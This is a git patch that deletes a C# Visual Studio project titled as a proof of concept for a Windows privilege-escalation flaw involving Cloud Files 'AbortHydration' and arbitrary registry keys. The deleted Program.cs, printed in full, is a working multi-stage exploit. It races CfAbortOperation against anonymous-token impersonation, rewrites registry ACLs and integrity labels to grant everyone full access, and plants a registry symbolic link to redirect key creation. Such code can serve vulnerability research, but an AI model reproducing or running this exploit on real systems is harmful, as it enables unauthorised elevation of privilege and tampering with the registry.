From 3894dd599dbc4289fc4074646268f1c1194c3fae Mon Sep 17 00:00:00 2001
From: Nightmare-Eclipse <terrainrepublic968@gmail.com>
Date: Sat, 16 May 2026 06:30:59 +0200
Subject: [PATCH] Delete src directory

---
 ...PoC_AbortHydration_ArbitraryRegKey_EoP.sln |  25 --
 .../App.config                                |   6 -
 ..._AbortHydration_ArbitraryRegKey_EoP.csproj |  59 ----
 .../Program.cs                                | 267 ------------------
 .../Properties/AssemblyInfo.cs                |  36 ---
 .../packages.config                           |   4 -
 6 files changed, 397 deletions(-)
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config

diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln b/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
deleted file mode 100644
index e387198..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
+++ /dev/null
@@ -1,25 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Version 16
-VisualStudioVersion = 16.0.30413.136
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PoC_AbortHydration_ArbitraryRegKey_EoP", "PoC_AbortHydration_ArbitraryRegKey_EoP\PoC_AbortHydration_ArbitraryRegKey_EoP.csproj", "{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Any CPU = Debug|Any CPU
-		Release|Any CPU = Release|Any CPU
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
-		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
-		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
-		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.Build.0 = Release|Any CPU
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-	GlobalSection(ExtensibilityGlobals) = postSolution
-		SolutionGuid = {AC46CFC5-1E96-44EF-8DC8-8D76B107B781}
-	EndGlobalSection
-EndGlobal
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
deleted file mode 100644
index 5754728..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
+++ /dev/null
@@ -1,6 +0,0 @@
-<?xml version="1.0" encoding="utf-8" ?>
-<configuration>
-    <startup> 
-        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
-    </startup>
-</configuration>
\ No newline at end of file
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
deleted file mode 100644
index 82dafa4..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
+++ /dev/null
@@ -1,59 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
-  <PropertyGroup>
-    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
-    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
-    <ProjectGuid>{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}</ProjectGuid>
-    <OutputType>Exe</OutputType>
-    <RootNamespace>PoC_AbortHydration_ArbitraryRegKey_EoP</RootNamespace>
-    <AssemblyName>PoC_AbortHydration_ArbitraryRegKey_EoP</AssemblyName>
-    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
-    <FileAlignment>512</FileAlignment>
-    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
-    <Deterministic>true</Deterministic>
-  </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugSymbols>true</DebugSymbols>
-    <DebugType>full</DebugType>
-    <Optimize>false</Optimize>
-    <OutputPath>bin\Debug\</OutputPath>
-    <DefineConstants>DEBUG;TRACE</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-    <Prefer32Bit>false</Prefer32Bit>
-  </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugType>pdbonly</DebugType>
-    <Optimize>true</Optimize>
-    <OutputPath>bin\Release\</OutputPath>
-    <DefineConstants>TRACE</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-    <Prefer32Bit>false</Prefer32Bit>
-  </PropertyGroup>
-  <ItemGroup>
-    <Reference Include="NtApiDotNet, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
-      <HintPath>..\packages\NtApiDotNet.1.1.28\lib\net45\NtApiDotNet.dll</HintPath>
-    </Reference>
-    <Reference Include="System" />
-    <Reference Include="System.Core" />
-    <Reference Include="System.Xml.Linq" />
-    <Reference Include="System.Data.DataSetExtensions" />
-    <Reference Include="Microsoft.CSharp" />
-    <Reference Include="System.Data" />
-    <Reference Include="System.Net.Http" />
-    <Reference Include="System.Xml" />
-  </ItemGroup>
-  <ItemGroup>
-    <Compile Include="Program.cs" />
-    <Compile Include="Properties\AssemblyInfo.cs" />
-  </ItemGroup>
-  <ItemGroup>
-    <None Include="App.config" />
-    <None Include="packages.config" />
-  </ItemGroup>
-  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
-</Project>
\ No newline at end of file
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
deleted file mode 100644
index 9429502..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
+++ /dev/null
@@ -1,267 +0,0 @@
-using NtApiDotNet;
-using NtApiDotNet.Win32;
-using System;
-using System.Runtime.InteropServices;
-using System.Threading;
-
-namespace PoC_AbortHydration_ArbitraryRegKey_EoP
-{
-    static class Program
-    {
-        static NtKey OpenKey(NtKey root, string path, KeyAccessRights desired_access)
-        {
-            Console.WriteLine("Opening for {0}", desired_access);
-            using (var obja = new ObjectAttributes(path, AttributeFlags.OpenLink, root))
-            {
-                using (var key = NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile, false))
-                {
-                    if (key.IsSuccess)
-                        return key.Result.Duplicate();
-                }
-
-                using (var imp = NtThread.Current.ImpersonateAnonymousToken())
-                {
-                    return NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile);
-                }
-            }
-        }
-
-        static void SetSecurityDescriptor(NtKey key, SecurityInformation info)
-        {
-            var sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;OICIIO;GA;;;AN)(A;;GA;;;WD)(A;;GA;;;AN)S:(ML;OICI;NW;;;S-1-16-0)");
-            key.SetSecurityDescriptor(sd, info);
-        }
-
-        static void ForceKeyDeleteKey(NtKey root, string name)
-        {
-            Console.WriteLine(@"Deleting {0}\{1}", root.FullPath, name);
-            using (var key = OpenKey(root, name, KeyAccessRights.WriteDac))
-            {
-                Console.WriteLine("Opened for WriteDac");
-                SetSecurityDescriptor(key, SecurityInformation.Dacl);
-            }
-
-            using (var key = OpenKey(root, name, KeyAccessRights.WriteOwner))
-            {
-                Console.WriteLine("Opened for WriteOwner");
-                SetSecurityDescriptor(key, SecurityInformation.Label);
-            }
-
-            using (var new_key = OpenKey(root, name, KeyAccessRights.Delete | KeyAccessRights.EnumerateSubKeys))
-            {
-                Console.WriteLine("Opened for enumerate.");
-                DeleteRegistryTree(new_key);
-                new_key.Delete();
-            }
-        }
-
-        static void DeleteRegistryTree(NtKey root)
-        {
-            foreach (var name in root.QueryKeys())
-            {
-                ForceKeyDeleteKey(root, name);
-            }
-        }
-
-        [Flags]
-        enum AbortHydrationFlags
-        {
-            None = 0,
-            Unblock = 1,
-            Block = 2,
-        }
-
-        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
-        static extern int CfAbortOperation(int pid, IntPtr unknown, AbortHydrationFlags flags);
-
-        [StructLayout(LayoutKind.Sequential)]
-        struct CF_PLATFORM_INFO
-        {
-            public int BuildNumber;
-            public int RevisionNumber;
-            public int IntegrationNumber;
-        }
-
-        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
-        static extern int CfGetPlatformInfo(
-          out CF_PLATFORM_INFO PlatformVersion
-        );
-
-        static void ForceTokenThread(object obj)
-        {
-            try
-            {
-                using (var thread = (NtThread)obj)
-                {
-                    Console.WriteLine("In force token thread {0}", thread);
-                    using (var token = TokenUtils.GetAnonymousToken())
-                    {
-                        while (true)
-                        {
-                            thread.SetImpersonationToken(token);
-                            thread.SetImpersonationToken(null);
-                        }
-                    }
-                }
-            }
-            catch(ThreadAbortException)
-            {
-                return;
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine(ex);
-            }
-        }
-
-        const string ROOT_KEY = @"\Registry\User\.DEFAULT\Software\Policies\Microsoft";
-        static string CLOUD_FILES = $@"{ROOT_KEY}\CloudFiles";
-        static string BLOCKED_APPS = $@"{CLOUD_FILES}\BlockedApps";
-        const string TARGET_KEY = @"\Registry\User\.DEFAULT\DEMODEMO";
-
-        static void CheckKeyThread(object root_key)
-        {
-            string path = (bool)root_key ? ROOT_KEY : @"\Registry\User\.DEFAULT";
-            try
-            {
-                using (var key = NtKey.Open(path, null, KeyAccessRights.MaximumAllowed))
-                {
-                    while (true)
-                    {
-                        if (key.NotifyChange(NotifyCompletionFilter.Name, true) == NtStatus.STATUS_NOTIFY_ENUM_DIR)
-                        {
-                            Console.WriteLine("Change detected.");
-                            Environment.Exit(0);
-                            break;
-                        }
-                    }
-                }
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine(ex);
-            }
-        }
-
-        static int Check(this int hr)
-        {
-            if (hr < 0)
-                Marshal.ThrowExceptionForHR(hr);
-            return hr;
-        }
-
-        const int MAX_STAGE = 4;
-
-        static void Stage0()
-        {
-            for (int i = 1; i < MAX_STAGE; ++i)
-            {
-                Win32ProcessConfig config = new Win32ProcessConfig
-                {
-                    CommandLine = $"run {i}",
-                    ApplicationName = typeof(Program).Assembly.Location,
-                    TerminateOnDispose = true
-                };
-
-                using (var p = Win32Process.CreateProcess(config))
-                {
-                    if (p.Process.Wait(10) != NtStatus.STATUS_SUCCESS)
-                    {
-                        throw new ArgumentException($"Failed to run stage {i}");
-                    }
-                }
-            }
-        }
-
-        static void Stage1(bool root_key)
-        {
-            Thread check_key_th = new Thread(CheckKeyThread);
-            check_key_th.IsBackground = true;
-            check_key_th.Start(root_key);
-            Thread.Sleep(1000);
-
-            var th = NtThread.OpenCurrent();
-            var anon_thread = new Thread(ForceTokenThread)
-            {
-                IsBackground = true
-            };
-            anon_thread.Start(th);
-
-            while (true)
-            {
-                CfAbortOperation(NtProcess.Current.ProcessId,
-                    IntPtr.Zero, AbortHydrationFlags.Block);
-            }
-        }
-
-        static void Stage2()
-        {
-            using (var key = OpenKey(null, CLOUD_FILES, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner | KeyAccessRights.EnumerateSubKeys))
-            {
-                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
-                DeleteRegistryTree(key);
-            }
-
-            NtKey.CreateSymbolicLink(BLOCKED_APPS, null, TARGET_KEY);
-            Stage1(false);
-        }
-
-        static void Stage3()
-        {
-            using (var key = OpenKey(null, BLOCKED_APPS, KeyAccessRights.Delete))
-            {
-                Console.WriteLine("Cleaning up link {0}", key.FullPath);
-                key.Delete();
-            }
-
-            using (var key = OpenKey(null, TARGET_KEY, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner))
-            {
-                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
-            }
-        }
-
-        static void Main(string[] args)
-        {
-            try
-            {
-                CfGetPlatformInfo(out CF_PLATFORM_INFO _).Check();
-
-                if (args.Length <= 1)
-                {
-                    int stage = args.Length > 0 ? int.Parse(args[0]) : 0;
-                    switch (stage)
-                    {
-                        case 0:
-                            Stage0();
-                            break;
-                        case 1:
-                            Stage1(true);
-                            break;
-                        case 2:
-                            Stage2();
-                            break;
-                        case 3:
-                            Stage3();
-                            break;
-                        default:
-                            throw new ArgumentException("Erm?");
-                    }
-                }
-                else
-                {
-                    using (var token = TokenUtils.GetLogonUserToken(args[0], "", args[1], SecurityLogonType.Network, null))
-                    {
-                        using (var imp = token.Impersonate())
-                        {
-                            CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block).Check();
-                        }
-                    }
-                }
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine(ex);
-            }
-        }
-    }
-}
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
deleted file mode 100644
index 6e2483f..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
+++ /dev/null
@@ -1,36 +0,0 @@
-using System.Reflection;
-using System.Runtime.CompilerServices;
-using System.Runtime.InteropServices;
-
-// General Information about an assembly is controlled through the following
-// set of attributes. Change these attribute values to modify the information
-// associated with an assembly.
-[assembly: AssemblyTitle("PoC_AbortHydration_ArbitraryRegKey_EoP")]
-[assembly: AssemblyDescription("")]
-[assembly: AssemblyConfiguration("")]
-[assembly: AssemblyCompany("")]
-[assembly: AssemblyProduct("PoC_AbortHydration_ArbitraryRegKey_EoP")]
-[assembly: AssemblyCopyright("Copyright ©  2020")]
-[assembly: AssemblyTrademark("")]
-[assembly: AssemblyCulture("")]
-
-// Setting ComVisible to false makes the types in this assembly not visible
-// to COM components.  If you need to access a type in this assembly from
-// COM, set the ComVisible attribute to true on that type.
-[assembly: ComVisible(false)]
-
-// The following GUID is for the ID of the typelib if this project is exposed to COM
-[assembly: Guid("352f6dd7-9b05-4896-9e7d-2efa36eac6e3")]
-
-// Version information for an assembly consists of the following four values:
-//
-//      Major Version
-//      Minor Version
-//      Build Number
-//      Revision
-//
-// You can specify all the values or you can default the Build and Revision Numbers
-// by using the '*' as shown below:
-// [assembly: AssemblyVersion("1.0.*")]
-[assembly: AssemblyVersion("1.0.0.0")]
-[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
deleted file mode 100644
index f78d31a..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
+++ /dev/null
@@ -1,4 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<packages>
-  <package id="NtApiDotNet" version="1.1.28" targetFramework="net472" />
-</packages>
\ No newline at end of file